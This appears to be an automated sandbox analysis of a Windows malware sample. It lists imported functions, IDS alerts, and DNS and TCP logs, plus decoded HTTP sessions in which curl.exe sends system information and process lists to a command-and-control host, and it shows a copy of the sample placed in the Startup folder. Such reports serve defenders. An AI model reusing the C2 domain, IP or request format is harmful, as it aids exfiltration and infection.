      SHELL32.dllDragFinish, DragQueryPoint, ShellExecuteExW, DragQueryFileW, SHEmptyRecycleBinW, SHGetPathFromIDListW, SHBrowseForFolderW, SHCreateShellItem, SHGetDesktopFolder, SHGetSpecialFolderLocation, SHGetFolderPathW, SHFileOperationW, ExtractIconExW, Shell_NotifyIconW, ShellExecuteW
      ole32.dllCoTaskMemAlloc, CoTaskMemFree, CLSIDFromString, ProgIDFromCLSID, CLSIDFromProgID, OleSetMenuDescriptor, MkParseDisplayName, OleSetContainedObject, CoCreateInstance, IIDFromString, StringFromGUID2, CreateStreamOnHGlobal, OleInitialize, OleUninitialize, CoInitialize, CoUninitialize, GetRunningObjectTable, CoGetInstanceFromFile, CoGetObject, CoInitializeSecurity, CoCreateInstanceEx, CoSetProxyBlanket
      OLEAUT32.dllCreateStdDispatch, CreateDispTypeInfo, UnRegisterTypeLib, UnRegisterTypeLibForUser, RegisterTypeLibForUser, RegisterTypeLib, LoadTypeLibEx, VariantCopyInd, SysReAllocString, SysFreeString, VariantChangeType, SafeArrayDestroyData, SafeArrayUnaccessData, SafeArrayAccessData, SafeArrayAllocData, SafeArrayAllocDescriptorEx, SafeArrayCreateVector, SysStringLen, QueryPathOfRegTypeLib, SysAllocString, VariantInit, VariantClear, DispCallFunc, VariantTimeToSystemTime, VarR8FromDec, SafeArrayGetVartype, SafeArrayDestroyDescriptor, VariantCopy, OleLoadPicture
      Language of compilation systemCountry where language is spokenMap
      EnglishGreat Britain
      TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
      2024-12-12T16:46:14.864811+01002018886ET MALWARE Windows TaskList Microsoft Windows DOS prompt command exit OUTBOUND1192.168.2.54972094.154.172.218443TCP
      2024-12-12T16:46:34.577073+01002018886ET MALWARE Windows TaskList Microsoft Windows DOS prompt command exit OUTBOUND1192.168.2.54976394.154.172.218443TCP
      TimestampSource PortDest PortSource IPDest IP
      Dec 12, 2024 16:46:13.042033911 CET49720443192.168.2.594.154.172.218
      Dec 12, 2024 16:46:13.042109013 CET4434972094.154.172.218192.168.2.5
      Dec 12, 2024 16:46:13.042289972 CET49720443192.168.2.594.154.172.218
      Dec 12, 2024 16:46:13.072992086 CET49720443192.168.2.594.154.172.218
      Dec 12, 2024 16:46:13.073046923 CET4434972094.154.172.218192.168.2.5
      Dec 12, 2024 16:46:14.857752085 CET4434972094.154.172.218192.168.2.5
      Dec 12, 2024 16:46:14.858910084 CET49720443192.168.2.594.154.172.218
      Dec 12, 2024 16:46:14.860596895 CET49720443192.168.2.594.154.172.218
      Dec 12, 2024 16:46:14.860606909 CET4434972094.154.172.218192.168.2.5
      Dec 12, 2024 16:46:14.860961914 CET4434972094.154.172.218192.168.2.5
      Dec 12, 2024 16:46:14.864289045 CET49720443192.168.2.594.154.172.218
      Dec 12, 2024 16:46:14.864367008 CET4434972094.154.172.218192.168.2.5
      Dec 12, 2024 16:46:14.864542007 CET49720443192.168.2.594.154.172.218
      Dec 12, 2024 16:46:14.864548922 CET4434972094.154.172.218192.168.2.5
      Dec 12, 2024 16:46:15.467987061 CET4434972094.154.172.218192.168.2.5
      Dec 12, 2024 16:46:15.468147039 CET4434972094.154.172.218192.168.2.5
      Dec 12, 2024 16:46:15.468256950 CET49720443192.168.2.594.154.172.218
      Dec 12, 2024 16:46:15.538610935 CET49720443192.168.2.594.154.172.218
      Dec 12, 2024 16:46:15.538644075 CET4434972094.154.172.218192.168.2.5
      Dec 12, 2024 16:46:16.671097040 CET49725443192.168.2.594.154.172.218
      Dec 12, 2024 16:46:16.671148062 CET4434972594.154.172.218192.168.2.5
      Dec 12, 2024 16:46:16.671212912 CET49725443192.168.2.594.154.172.218
      Dec 12, 2024 16:46:16.678082943 CET49725443192.168.2.594.154.172.218
      Dec 12, 2024 16:46:16.678102970 CET4434972594.154.172.218192.168.2.5
      Dec 12, 2024 16:46:18.442889929 CET4434972594.154.172.218192.168.2.5
      Dec 12, 2024 16:46:18.442953110 CET49725443192.168.2.594.154.172.218
      Dec 12, 2024 16:46:18.444988966 CET49725443192.168.2.594.154.172.218
      Dec 12, 2024 16:46:18.444996119 CET4434972594.154.172.218192.168.2.5
      Dec 12, 2024 16:46:18.445307016 CET4434972594.154.172.218192.168.2.5
      Dec 12, 2024 16:46:18.448945999 CET49725443192.168.2.594.154.172.218
      Dec 12, 2024 16:46:18.495338917 CET4434972594.154.172.218192.168.2.5
      Dec 12, 2024 16:46:18.882273912 CET4434972594.154.172.218192.168.2.5
      Dec 12, 2024 16:46:18.882359028 CET4434972594.154.172.218192.168.2.5
      Dec 12, 2024 16:46:18.882421017 CET49725443192.168.2.594.154.172.218
      Dec 12, 2024 16:46:18.945658922 CET49725443192.168.2.594.154.172.218
      Dec 12, 2024 16:46:18.945688963 CET4434972594.154.172.218192.168.2.5
      Dec 12, 2024 16:46:20.087704897 CET49729443192.168.2.594.154.172.218
      Dec 12, 2024 16:46:20.087769032 CET4434972994.154.172.218192.168.2.5
      Dec 12, 2024 16:46:20.087846041 CET49729443192.168.2.594.154.172.218
      Dec 12, 2024 16:46:20.249775887 CET49729443192.168.2.594.154.172.218
      Dec 12, 2024 16:46:20.249803066 CET4434972994.154.172.218192.168.2.5
      Dec 12, 2024 16:46:22.016448975 CET4434972994.154.172.218192.168.2.5
      Dec 12, 2024 16:46:22.016545057 CET49729443192.168.2.594.154.172.218
      Dec 12, 2024 16:46:22.017864943 CET49729443192.168.2.594.154.172.218
      Dec 12, 2024 16:46:22.017874956 CET4434972994.154.172.218192.168.2.5
      Dec 12, 2024 16:46:22.018151045 CET4434972994.154.172.218192.168.2.5
      Dec 12, 2024 16:46:22.020883083 CET49729443192.168.2.594.154.172.218
      Dec 12, 2024 16:46:22.067332029 CET4434972994.154.172.218192.168.2.5
      Dec 12, 2024 16:46:22.436158895 CET4434972994.154.172.218192.168.2.5
      Dec 12, 2024 16:46:22.436261892 CET4434972994.154.172.218192.168.2.5
      Dec 12, 2024 16:46:22.436319113 CET49729443192.168.2.594.154.172.218
      Dec 12, 2024 16:46:22.444262028 CET49729443192.168.2.594.154.172.218
      Dec 12, 2024 16:46:22.444277048 CET4434972994.154.172.218192.168.2.5
      Dec 12, 2024 16:46:22.721173048 CET49737443192.168.2.594.154.172.218
      Dec 12, 2024 16:46:22.721235037 CET4434973794.154.172.218192.168.2.5
      Dec 12, 2024 16:46:22.721316099 CET49737443192.168.2.594.154.172.218
      Dec 12, 2024 16:46:22.729218960 CET49737443192.168.2.594.154.172.218
      Dec 12, 2024 16:46:22.729239941 CET4434973794.154.172.218192.168.2.5
      Dec 12, 2024 16:46:24.512527943 CET4434973794.154.172.218192.168.2.5
      Dec 12, 2024 16:46:24.512612104 CET49737443192.168.2.594.154.172.218
      Dec 12, 2024 16:46:24.514045000 CET49737443192.168.2.594.154.172.218
      Dec 12, 2024 16:46:24.514059067 CET4434973794.154.172.218192.168.2.5
      Dec 12, 2024 16:46:24.514307022 CET4434973794.154.172.218192.168.2.5
      Dec 12, 2024 16:46:24.518237114 CET49737443192.168.2.594.154.172.218
      Dec 12, 2024 16:46:24.559340000 CET4434973794.154.172.218192.168.2.5
      Dec 12, 2024 16:46:24.942243099 CET4434973794.154.172.218192.168.2.5
      Dec 12, 2024 16:46:24.942332983 CET4434973794.154.172.218192.168.2.5
      Dec 12, 2024 16:46:24.942900896 CET49737443192.168.2.594.154.172.218
      Dec 12, 2024 16:46:24.949433088 CET49737443192.168.2.594.154.172.218
      Dec 12, 2024 16:46:24.949471951 CET4434973794.154.172.218192.168.2.5
      Dec 12, 2024 16:46:32.786081076 CET49763443192.168.2.594.154.172.218
      Dec 12, 2024 16:46:32.786143064 CET4434976394.154.172.218192.168.2.5
      Dec 12, 2024 16:46:32.786259890 CET49763443192.168.2.594.154.172.218
      Dec 12, 2024 16:46:32.796171904 CET49763443192.168.2.594.154.172.218
      Dec 12, 2024 16:46:32.796221972 CET4434976394.154.172.218192.168.2.5
      Dec 12, 2024 16:46:34.564544916 CET4434976394.154.172.218192.168.2.5
      Dec 12, 2024 16:46:34.564661980 CET49763443192.168.2.594.154.172.218
      Dec 12, 2024 16:46:34.567735910 CET49763443192.168.2.594.154.172.218
      Dec 12, 2024 16:46:34.567749023 CET4434976394.154.172.218192.168.2.5
      Dec 12, 2024 16:46:34.568020105 CET4434976394.154.172.218192.168.2.5
      Dec 12, 2024 16:46:34.576581001 CET49763443192.168.2.594.154.172.218
      Dec 12, 2024 16:46:34.576641083 CET4434976394.154.172.218192.168.2.5
      Dec 12, 2024 16:46:34.576854944 CET49763443192.168.2.594.154.172.218
      Dec 12, 2024 16:46:34.576863050 CET4434976394.154.172.218192.168.2.5
      Dec 12, 2024 16:46:34.577037096 CET49763443192.168.2.594.154.172.218
      Dec 12, 2024 16:46:34.577042103 CET4434976394.154.172.218192.168.2.5
      Dec 12, 2024 16:46:35.244925022 CET4434976394.154.172.218192.168.2.5
      Dec 12, 2024 16:46:35.245029926 CET4434976394.154.172.218192.168.2.5
      Dec 12, 2024 16:46:35.245107889 CET49763443192.168.2.594.154.172.218
      Dec 12, 2024 16:46:35.257425070 CET49763443192.168.2.594.154.172.218
      Dec 12, 2024 16:46:35.257446051 CET4434976394.154.172.218192.168.2.5
      Dec 12, 2024 16:46:35.487878084 CET49771443192.168.2.594.154.172.218
      Dec 12, 2024 16:46:35.487926006 CET4434977194.154.172.218192.168.2.5
      Dec 12, 2024 16:46:35.488179922 CET49771443192.168.2.594.154.172.218
      Dec 12, 2024 16:46:35.496072054 CET49771443192.168.2.594.154.172.218
      Dec 12, 2024 16:46:35.496094942 CET4434977194.154.172.218192.168.2.5
      Dec 12, 2024 16:46:37.259031057 CET4434977194.154.172.218192.168.2.5
      Dec 12, 2024 16:46:37.259155035 CET49771443192.168.2.594.154.172.218
      Dec 12, 2024 16:46:37.261069059 CET49771443192.168.2.594.154.172.218
      Dec 12, 2024 16:46:37.261090994 CET4434977194.154.172.218192.168.2.5
      Dec 12, 2024 16:46:37.261363029 CET4434977194.154.172.218192.168.2.5
      Dec 12, 2024 16:46:37.263915062 CET49771443192.168.2.594.154.172.218
      Dec 12, 2024 16:46:37.311328888 CET4434977194.154.172.218192.168.2.5
      Dec 12, 2024 16:46:37.681941032 CET4434977194.154.172.218192.168.2.5
      Dec 12, 2024 16:46:37.682035923 CET4434977194.154.172.218192.168.2.5
      Dec 12, 2024 16:46:37.682140112 CET49771443192.168.2.594.154.172.218
      Dec 12, 2024 16:46:37.717919111 CET49771443192.168.2.594.154.172.218
      Dec 12, 2024 16:46:37.717935085 CET4434977194.154.172.218192.168.2.5
      Dec 12, 2024 16:46:38.050894976 CET49785443192.168.2.594.154.172.218
      Dec 12, 2024 16:46:38.050950050 CET4434978594.154.172.218192.168.2.5
      Dec 12, 2024 16:46:38.051348925 CET49785443192.168.2.594.154.172.218
      Dec 12, 2024 16:46:38.064066887 CET49785443192.168.2.594.154.172.218
      Dec 12, 2024 16:46:38.064081907 CET4434978594.154.172.218192.168.2.5
      Dec 12, 2024 16:46:39.831716061 CET4434978594.154.172.218192.168.2.5
      Dec 12, 2024 16:46:39.831902981 CET49785443192.168.2.594.154.172.218
      Dec 12, 2024 16:46:39.833419085 CET49785443192.168.2.594.154.172.218
      Dec 12, 2024 16:46:39.833451033 CET4434978594.154.172.218192.168.2.5
      Dec 12, 2024 16:46:39.833714962 CET4434978594.154.172.218192.168.2.5
      Dec 12, 2024 16:46:39.836577892 CET49785443192.168.2.594.154.172.218
      Dec 12, 2024 16:46:39.883328915 CET4434978594.154.172.218192.168.2.5
      Dec 12, 2024 16:46:40.263060093 CET4434978594.154.172.218192.168.2.5
      Dec 12, 2024 16:46:40.263139963 CET4434978594.154.172.218192.168.2.5
      Dec 12, 2024 16:46:40.263294935 CET49785443192.168.2.594.154.172.218
      Dec 12, 2024 16:46:40.272480965 CET49785443192.168.2.594.154.172.218
      Dec 12, 2024 16:46:40.272516966 CET4434978594.154.172.218192.168.2.5
      Dec 12, 2024 16:46:40.792059898 CET49793443192.168.2.594.154.172.218
      Dec 12, 2024 16:46:40.792105913 CET4434979394.154.172.218192.168.2.5
      Dec 12, 2024 16:46:40.792195082 CET49793443192.168.2.594.154.172.218
      Dec 12, 2024 16:46:40.814229965 CET49793443192.168.2.594.154.172.218
      Dec 12, 2024 16:46:40.814308882 CET4434979394.154.172.218192.168.2.5
      Dec 12, 2024 16:46:42.578455925 CET4434979394.154.172.218192.168.2.5
      Dec 12, 2024 16:46:42.578583956 CET49793443192.168.2.594.154.172.218
      Dec 12, 2024 16:46:42.579860926 CET49793443192.168.2.594.154.172.218
      Dec 12, 2024 16:46:42.579885006 CET4434979394.154.172.218192.168.2.5
      Dec 12, 2024 16:46:42.580146074 CET4434979394.154.172.218192.168.2.5
      Dec 12, 2024 16:46:42.582655907 CET49793443192.168.2.594.154.172.218
      Dec 12, 2024 16:46:42.627335072 CET4434979394.154.172.218192.168.2.5
      Dec 12, 2024 16:46:43.005196095 CET4434979394.154.172.218192.168.2.5
      Dec 12, 2024 16:46:43.005280972 CET4434979394.154.172.218192.168.2.5
      Dec 12, 2024 16:46:43.005414963 CET49793443192.168.2.594.154.172.218
      Dec 12, 2024 16:46:43.013545036 CET49793443192.168.2.594.154.172.218
      Dec 12, 2024 16:46:43.013607025 CET4434979394.154.172.218192.168.2.5
      TimestampSource PortDest PortSource IPDest IP
      Dec 12, 2024 16:46:12.613166094 CET5427753192.168.2.51.1.1.1
      Dec 12, 2024 16:46:13.020836115 CET53542771.1.1.1192.168.2.5
      TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
      Dec 12, 2024 16:46:12.613166094 CET192.168.2.51.1.1.10xe5aaStandard query (0)peerhost59mj7i6macla65r.comA (IP address)IN (0x0001)false
      TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
      Dec 12, 2024 16:46:13.020836115 CET1.1.1.1192.168.2.50xe5aaNo error (0)peerhost59mj7i6macla65r.com94.154.172.218A (IP address)IN (0x0001)false
      • 433a5c55736572735c616c666f6e735c4465736b746f705c66696c652e657865x-auth:
        • peerhost59mj7i6macla65r.com
      • 433a5c55736572735c616c666f6e735c417070446174615c526f616d696e675c4d6963726f736f66745c57696e646f77735c5374617274204d656e755c50726f6772616d735c537461727475705c66696c652e657865x-auth:
      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
      0192.168.2.54972094.154.172.2184432212C:\Windows\SysWOW64\curl.exe
      TimestampBytes transferredDirectionData
      2024-12-12 15:46:14 UTC439OUTPOST /search/ HTTP/1.1
      Host: peerhost59mj7i6macla65r.com
      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/132.0.0.0 Safari/537.36 Edg/130.0.2849.80
      Accept: */*
      X-Reply: 1
      X-Referer: 433A5C55736572735C616C666F6E735C4465736B746F705C66696C652E657865
      X-Auth: 2F414C464F4E532D50432F616C666F6E732F32
      X-Sec-Id: 0
      Content-Length: 17852
      Content-Type: application/x-www-form-urlencoded
      2024-12-12 15:46:14 UTC15945OUTData Raw: 0d 0a 48 6f 73 74 20 4e 61 6d 65 3a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 41 4c 46 4f 4e 53 2d 50 43 0d 0a 4f 53 20 4e 61 6d 65 3a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 4d 69 63 72 6f 73 6f 66 74 20 57 69 6e 64 6f 77 73 20 31 30 20 50 72 6f 0d 0a 4f 53 20 56 65 72 73 69 6f 6e 3a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 31 30 2e 30 2e 31 39 30 34 35 20 4e 2f 41 20 42 75 69 6c 64 20 31 39 30 34 35 0d 0a 4f 53 20 4d 61 6e 75 66 61 63 74 75 72 65 72 3a 20 20 20 20 20 20 20 20 20 20 20 4d 69 63 72 6f 73 6f 66 74 20 43 6f 72 70 6f 72 61 74 69 6f 6e 0d 0a 4f 53 20 43 6f 6e 66 69 67 75 72 61 74 69 6f 6e 3a 20 20 20 20 20 20 20 20 20 20 53 74 61 6e 64 61 6c 6f 6e 65 20 57 6f 72 6b 73 74 61 74 69 6f 6e 0d 0a 4f 53 20 42 75 69
      Data Ascii: Host Name: user-PCOS Name: Microsoft Windows 10 ProOS Version: 10.0.19045 N/A Build 19045OS Manufacturer: Microsoft CorporationOS Configuration: Standalone WorkstationOS Bui
      2024-12-12 15:46:14 UTC1907OUTData Raw: 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 31 20 20 20 20 20 20 36 27 36 32 30 20 4b 0d 0a 49 44 74 76 67 41 78 72 62 50 51 4b 5a 58 44 4f 59 6a 4c 78 4e 6a 51 4f 2e 20 20 20 20 20 33 31 31 36 20 43 6f 6e 73 6f 6c 65 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 31 20 20 20 20 20 20 36 27 36 31 36 20 4b 0d 0a 49 44 74 76 67 41 78 72 62 50 51 4b 5a 58 44 4f 59 6a 4c 78 4e 6a 51 4f 2e 20 20 20 20 20 32 35 37 36 20 43 6f 6e 73 6f 6c 65 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 31 20 20 20 20 20 20 36 27 36 32 34 20 4b 0d 0a 49 44 74 76 67 41 78 72 62 50 51 4b 5a 58 44 4f 59 6a 4c 78 4e 6a 51 4f 2e 20 20 20 20 20 33 33 33 32 20 43 6f 6e 73 6f 6c 65 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 31 20
      Data Ascii: 1 6'620 KIDtvgAxrbPQKZXDOYjLxNjQO. 3116 Console 1 6'616 KIDtvgAxrbPQKZXDOYjLxNjQO. 2576 Console 1 6'624 KIDtvgAxrbPQKZXDOYjLxNjQO. 3332 Console 1
      2024-12-12 15:46:15 UTC191INHTTP/1.1 200 OK
      Server: nginx/1.14.1
      Date: Thu, 12 Dec 2024 15:46:15 GMT
      Content-Type: text/html; charset=UTF-8
      Transfer-Encoding: chunked
      Connection: close
      X-Powered-By: PHP/7.2.24
      2024-12-12 15:46:15 UTC12INData Raw: 32 0d 0a 0d 0a 0d 0a 30 0d 0a 0d 0a
      Data Ascii: 20


      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
      1192.168.2.54972594.154.172.218443748C:\Windows\SysWOW64\curl.exe
      TimestampBytes transferredDirectionData
      2024-12-12 15:46:18 UTC366OUTGET /search/ HTTP/1.1
      Host: peerhost59mj7i6macla65r.com
      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/132.0.0.0 Safari/537.36 Edg/130.0.2849.80
      Accept: */*
      X-Reply: 1
      X-Referer: 433A5C55736572735C616C666F6E735C4465736B746F705C66696C652E657865
      X-Auth: 2F414C464F4E532D50432F616C666F6E732F32
      X-Sec-Id: 3
      2024-12-12 15:46:18 UTC191INHTTP/1.1 200 OK
      Server: nginx/1.14.1
      Date: Thu, 12 Dec 2024 15:46:18 GMT
      Content-Type: text/html; charset=UTF-8
      Transfer-Encoding: chunked
      Connection: close
      X-Powered-By: PHP/7.2.24
      2024-12-12 15:46:18 UTC45INData Raw: 32 32 0d 0a 5b 41 75 64 69 6f 5d 0a 44 65 66 61 75 6c 74 3d 39 30 30 0a 41 75 74 6f 3d 31 0a 46 6f 72 63 65 3d 30 0d 0a 30 0d 0a 0d 0a
      Data Ascii: 22[Audio]Default=900Auto=1Force=00


      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
      2192.168.2.54972994.154.172.2184432780C:\Windows\SysWOW64\curl.exe
      TimestampBytes transferredDirectionData
      2024-12-12 15:46:22 UTC353OUTGET /search/ HTTP/1.1
      Host: peerhost59mj7i6macla65r.com
      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/132.0.0.0 Safari/537.36 Edg/130.0.2849.80
      Accept: */*
      X-Reply: 1
      X-Referer: 433A5C55736572735C616C666F6E735C4465736B746F705C66696C652E657865
      X-Auth: 2F414C464F4E532D50432F616C666F6E732F32
      2024-12-12 15:46:22 UTC191INHTTP/1.1 200 OK
      Server: nginx/1.14.1
      Date: Thu, 12 Dec 2024 15:46:22 GMT
      Content-Type: text/html; charset=UTF-8
      Transfer-Encoding: chunked
      Connection: close
      X-Powered-By: PHP/7.2.24
      2024-12-12 15:46:22 UTC12INData Raw: 32 0d 0a 0d 0a 0d 0a 30 0d 0a 0d 0a
      Data Ascii: 20


      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
      3192.168.2.54973794.154.172.2184436252C:\Windows\SysWOW64\curl.exe
      TimestampBytes transferredDirectionData
      2024-12-12 15:46:24 UTC435OUTPOST /search/ HTTP/1.1
      Host: peerhost59mj7i6macla65r.com
      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/132.0.0.0 Safari/537.36 Edg/130.0.2849.80
      Accept: */*
      X-Reply: 1
      X-Referer: 433A5C55736572735C616C666F6E735C4465736B746F705C66696C652E657865
      X-Auth: 2F414C464F4E532D50432F616C666F6E732F32
      X-Sec-Id: 1
      Content-Length: 0
      Content-Type: application/x-www-form-urlencoded
      2024-12-12 15:46:24 UTC191INHTTP/1.1 200 OK
      Server: nginx/1.14.1
      Date: Thu, 12 Dec 2024 15:46:24 GMT
      Content-Type: text/html; charset=UTF-8
      Transfer-Encoding: chunked
      Connection: close
      X-Powered-By: PHP/7.2.24
      2024-12-12 15:46:24 UTC12INData Raw: 32 0d 0a 0d 0a 0d 0a 30 0d 0a 0d 0a
      Data Ascii: 20


      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
      4192.168.2.54976394.154.172.2184433836C:\Windows\SysWOW64\curl.exe
      TimestampBytes transferredDirectionData
      2024-12-12 15:46:34 UTC547OUTPOST /search/ HTTP/1.1
      Host: peerhost59mj7i6macla65r.com
      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/132.0.0.0 Safari/537.36 Edg/130.0.2849.80
      Accept: */*
      X-Reply: 1
      X-Referer: 433A5C55736572735C616C666F6E735C417070446174615C526F616D696E675C4D6963726F736F66745C57696E646F77735C5374617274204D656E755C50726F6772616D735C537461727475705C66696C652E657865
      X-Auth: 2F414C464F4E532D50432F616C666F6E732F32
      X-Sec-Id: 0
      Content-Length: 17774
      Content-Type: application/x-www-form-urlencoded
      2024-12-12 15:46:34 UTC15837OUTData Raw: 0d 0a 48 6f 73 74 20 4e 61 6d 65 3a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 41 4c 46 4f 4e 53 2d 50 43 0d 0a 4f 53 20 4e 61 6d 65 3a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 4d 69 63 72 6f 73 6f 66 74 20 57 69 6e 64 6f 77 73 20 31 30 20 50 72 6f 0d 0a 4f 53 20 56 65 72 73 69 6f 6e 3a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 31 30 2e 30 2e 31 39 30 34 35 20 4e 2f 41 20 42 75 69 6c 64 20 31 39 30 34 35 0d 0a 4f 53 20 4d 61 6e 75 66 61 63 74 75 72 65 72 3a 20 20 20 20 20 20 20 20 20 20 20 4d 69 63 72 6f 73 6f 66 74 20 43 6f 72 70 6f 72 61 74 69 6f 6e 0d 0a 4f 53 20 43 6f 6e 66 69 67 75 72 61 74 69 6f 6e 3a 20 20 20 20 20 20 20 20 20 20 53 74 61 6e 64 61 6c 6f 6e 65 20 57 6f 72 6b 73 74 61 74 69 6f 6e 0d 0a 4f 53 20 42 75 69
      Data Ascii: Host Name: user-PCOS Name: Microsoft Windows 10 ProOS Version: 10.0.19045 N/A Build 19045OS Manufacturer: Microsoft CorporationOS Configuration: Standalone WorkstationOS Bui
      2024-12-12 15:46:34 UTC1937OUTData Raw: 58 44 4f 59 6a 4c 78 4e 6a 51 4f 2e 20 20 20 20 20 33 31 31 36 20 43 6f 6e 73 6f 6c 65 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 31 20 20 20 20 20 20 36 27 36 31 36 20 4b 0d 0a 49 44 74 76 67 41 78 72 62 50 51 4b 5a 58 44 4f 59 6a 4c 78 4e 6a 51 4f 2e 20 20 20 20 20 32 35 37 36 20 43 6f 6e 73 6f 6c 65 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 31 20 20 20 20 20 20 36 27 36 32 34 20 4b 0d 0a 49 44 74 76 67 41 78 72 62 50 51 4b 5a 58 44 4f 59 6a 4c 78 4e 6a 51 4f 2e 20 20 20 20 20 33 33 33 32 20 43 6f 6e 73 6f 6c 65 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 31 20 20 20 20 20 20 36 27 36 32 34 20 4b 0d 0a 49 44 74 76 67 41 78 72 62 50 51 4b 5a 58 44 4f 59 6a 4c 78 4e 6a 51 4f 2e 20 20 20 20 20 34 34 30 34
      Data Ascii: XDOYjLxNjQO. 3116 Console 1 6'616 KIDtvgAxrbPQKZXDOYjLxNjQO. 2576 Console 1 6'624 KIDtvgAxrbPQKZXDOYjLxNjQO. 3332 Console 1 6'624 KIDtvgAxrbPQKZXDOYjLxNjQO. 4404
      2024-12-12 15:46:35 UTC191INHTTP/1.1 200 OK
      Server: nginx/1.14.1
      Date: Thu, 12 Dec 2024 15:46:35 GMT
      Content-Type: text/html; charset=UTF-8
      Transfer-Encoding: chunked
      Connection: close
      X-Powered-By: PHP/7.2.24
      2024-12-12 15:46:35 UTC12INData Raw: 32 0d 0a 0d 0a 0d 0a 30 0d 0a 0d 0a
      Data Ascii: 20


      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
      5192.168.2.54977194.154.172.2184433620C:\Windows\SysWOW64\curl.exe
      TimestampBytes transferredDirectionData
      2024-12-12 15:46:37 UTC474OUTGET /search/ HTTP/1.1
      Host: peerhost59mj7i6macla65r.com
      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/132.0.0.0 Safari/537.36 Edg/130.0.2849.80
      Accept: */*
      X-Reply: 1
      X-Referer: 433A5C55736572735C616C666F6E735C417070446174615C526F616D696E675C4D6963726F736F66745C57696E646F77735C5374617274204D656E755C50726F6772616D735C537461727475705C66696C652E657865
      X-Auth: 2F414C464F4E532D50432F616C666F6E732F32
      X-Sec-Id: 3
      2024-12-12 15:46:37 UTC191INHTTP/1.1 200 OK
      Server: nginx/1.14.1
      Date: Thu, 12 Dec 2024 15:46:37 GMT
      Content-Type: text/html; charset=UTF-8
      Transfer-Encoding: chunked
      Connection: close
      X-Powered-By: PHP/7.2.24
      2024-12-12 15:46:37 UTC45INData Raw: 32 32 0d 0a 5b 41 75 64 69 6f 5d 0a 44 65 66 61 75 6c 74 3d 39 30 30 0a 41 75 74 6f 3d 31 0a 46 6f 72 63 65 3d 30 0d 0a 30 0d 0a 0d 0a
      Data Ascii: 22[Audio]Default=900Auto=1Force=00


      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
      6192.168.2.54978594.154.172.2184431716C:\Windows\SysWOW64\curl.exe
      TimestampBytes transferredDirectionData
      2024-12-12 15:46:39 UTC461OUTGET /search/ HTTP/1.1
      Host: peerhost59mj7i6macla65r.com
      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/132.0.0.0 Safari/537.36 Edg/130.0.2849.80
      Accept: */*
      X-Reply: 1
      X-Referer: 433A5C55736572735C616C666F6E735C417070446174615C526F616D696E675C4D6963726F736F66745C57696E646F77735C5374617274204D656E755C50726F6772616D735C537461727475705C66696C652E657865
      X-Auth: 2F414C464F4E532D50432F616C666F6E732F32
      2024-12-12 15:46:40 UTC191INHTTP/1.1 200 OK
      Server: nginx/1.14.1
      Date: Thu, 12 Dec 2024 15:46:40 GMT
      Content-Type: text/html; charset=UTF-8
      Transfer-Encoding: chunked
      Connection: close
      X-Powered-By: PHP/7.2.24
      2024-12-12 15:46:40 UTC12INData Raw: 32 0d 0a 0d 0a 0d 0a 30 0d 0a 0d 0a
      Data Ascii: 20


      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
      7192.168.2.54979394.154.172.2184435464C:\Windows\SysWOW64\curl.exe
      TimestampBytes transferredDirectionData
      2024-12-12 15:46:42 UTC543OUTPOST /search/ HTTP/1.1
      Host: peerhost59mj7i6macla65r.com
      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/132.0.0.0 Safari/537.36 Edg/130.0.2849.80
      Accept: */*
      X-Reply: 1
      X-Referer: 433A5C55736572735C616C666F6E735C417070446174615C526F616D696E675C4D6963726F736F66745C57696E646F77735C5374617274204D656E755C50726F6772616D735C537461727475705C66696C652E657865
      X-Auth: 2F414C464F4E532D50432F616C666F6E732F32
      X-Sec-Id: 1
      Content-Length: 0
      Content-Type: application/x-www-form-urlencoded
      2024-12-12 15:46:43 UTC191INHTTP/1.1 200 OK
      Server: nginx/1.14.1
      Date: Thu, 12 Dec 2024 15:46:42 GMT
      Content-Type: text/html; charset=UTF-8
      Transfer-Encoding: chunked
      Connection: close
      X-Powered-By: PHP/7.2.24
      2024-12-12 15:46:43 UTC12INData Raw: 32 0d 0a 0d 0a 0d 0a 30 0d 0a 0d 0a
      Data Ascii: 20


      Click to jump to process

      Click to jump to process

      Click to dive into process behavior distribution

      Click to jump to process

      Target ID:0
      Start time:10:46:08
